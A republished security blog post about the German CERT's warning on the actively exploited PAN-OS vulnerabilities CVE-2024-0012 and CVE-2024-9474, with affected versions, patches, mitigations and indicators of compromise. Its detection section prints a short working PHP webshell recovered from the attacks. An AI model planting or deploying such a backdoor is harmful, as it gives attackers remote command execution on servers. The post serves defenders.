German CERT Warns ‘Attacks are Happening,’ Urges PAN-OS Chained Vulnerabilities’ Patching

German CERT Warns ‘Attacks are Happening,’ Urges PAN-OS Chained Vulnerabilities’ Patching
2024-11-21 22:15:47 Author: cyble.com(查看原文) 阅读量:0 收藏

Overview

The German CERT has raised the alarm bells for the exploitation of chained vulnerabilities, urging users to patch them urgently as hundreds of vulnerable instances remain exposed around the country and the globe.

CERT-Bund warned in a notification on X earlier this week: “Attacks are already taking place. Customers should immediately secure their firewalls.” This warning was for two critical vulnerabilities, CVE-2024-0012 and CVE-2024-9474, in Palo Alto Networks’ PAN-OS.

Palo Alto confirmed that these bugs have been actively exploited in a limited set of attacks, tracking under the banner “Operation Lunar Peek.” These vulnerabilities allow attackers to gain unauthorized administrative privileges and execute arbitrary commands, posing a significant risk to organizations using affected devices.

While fixes have been released, the urgency of patching, monitoring, and securing firewall management interfaces has never been higher. This blog provides a detailed breakdown of the vulnerabilities, exploitation patterns, and actionable remediation strategies to safeguard against this ongoing threat.

Understanding the Vulnerabilities

CVE-2024-0012: Authentication Bypass Vulnerability

Severity: Critical
Impact: Allows unauthenticated attackers with network access to the management web interface to:
- Gain PAN-OS administrator privileges.
- Tamper with configurations.
- Exploit other privilege escalation vulnerabilities, such as CVE-2024-9474.
Affected Products:
PAN-OS 10.2, 11.0, 11.1, and 11.2 software on PA-Series, VM-Series, CN-Series firewalls, Panorama appliances, and WildFire.
Note: Cloud NGFW and Prisma Access are not affected.
Root Cause: Missing authentication checks for critical functions within the PAN-OS management web interface.

CVE-2024-9474: Privilege Escalation Vulnerability

Severity: Critical
Impact: Allows authenticated PAN-OS administrators to escalate privileges and execute arbitrary commands with root access.
Affected Products: Same as CVE-2024-0012, with additional fixes available for PAN-OS 10.1.

These vulnerabilities are particularly dangerous when chained together, enabling unauthenticated remote command execution on vulnerable devices. Palo Alto said that it assesses with moderate to high confidence that a functional exploit chaining CVE-2024-0012 and CVE-2024-9474 is publicly available.

Observed Exploitation in Operation Lunar Peek

Palo Alto Networks’ Unit 42 team is actively tracking exploitation activities tied to these vulnerabilities. Key observations include:

Initial Access: Exploitation has primarily targeted PAN-OS management web interfaces exposed to the internet. Many attacks originated from IP addresses associated with anonymous VPN services or proxies.
Post-Exploitation Activity:
- Interactive command execution.
- Deployment of webshells, such as a payload recovered with SHA256: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668.
- Potential lateral movement and further compromise of network assets.
Scanning Activity: Increased manual and automated scans, likely probing for vulnerable interfaces. A report by Censys found 13,324 publicly exposed management interfaces globally, with 34% located in the United States. More than 200 were located in Germany. German CERT has also confirmed active exploitation, urging organizations to “immediately secure their firewalls.”

Remediation and Mitigation

Patching

Palo Alto Networks has released patches addressing both vulnerabilities. Organizations must upgrade to the following versions immediately:

PAN-OS 10.2: 10.2.12-h2 or later.
PAN-OS 11.0: 11.0.6-h1 or later.
PAN-OS 11.1: 11.1.5-h1 or later.
PAN-OS 11.2: 11.2.4-h1 or later.
PAN-OS 10.1: 10.1.14-h6 (for CVE-2024-9474).

Securing Management Interfaces

Palo Alto Networks strongly recommends the following:

Restrict Interface Access: Allow only trusted internal IP addresses or designated jump boxes to access the management interface.
Disable Public Access: Block internet-facing access to the management interface via network-level controls.
Enable Two-Factor Authentication (2FA): Add an extra layer of security for administrator access.

Monitoring and Detection

Deploy detection rules for webshells and other malicious artifacts. The following decoded PHP webshell sample was observed during Operation Lunar Peek:

<?php $z=”system”;

if(${“_POST”}[“b”]==”iUqPd”)

{

$z(${“_POST”}[“x”]);

};

Watch for abnormal activities such as:
- Unrecognized configuration changes.
- New or suspicious administrator accounts.
- Command execution logs indicating unauthorized access.

Enhanced Factory Reset (EFR)

Organizations detecting evidence of compromise should:

Take affected devices offline immediately.
Perform an Enhanced Factory Reset (EFR) in collaboration with Palo Alto Networks support.
Reconfigure the device with updated firmware and secure management policies.

Indicators of Compromise (IOCs)

IP Addresses Observed in Scans and Exploits

Scanning Sources:
- 41.215.28[.]241
- 45.32.110[.]123
- 103.112.106[.]17
- 104.28.240[.]123
- 182.78.17[.]137
- 216.73.160[.]186

Threat Actor Proxies:
- 91.208.197[.]167
- 104.28.208[.]123
- 136.144.17[.]146
- 136.144.17[.]149
- 136.144.17[.]154
- 136.144.17[.]158
- 136.144.17[.]161
- 136.144.17[.]164
- 136.144.17[.]166
- 136.144.17[.]167
- 136.144.17[.]170
- 136.144.17[.]176
- 136.144.17[.]177
- 136.144.17[.]178
- 136.144.17[.]180
- 173.239.218[.]248
- 173.239.218[.]251
- 209.200.246[.]173
- 209.200.246[.]184
- 216.73.162[.]69
- 216.73.162[.]71
- 216.73.162[.]73
- 216.73.162[.]74

Malicious Artifacts

Webshell payload hash (PHP webshell payload dropped on a compromised firewall – SHA256): 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668.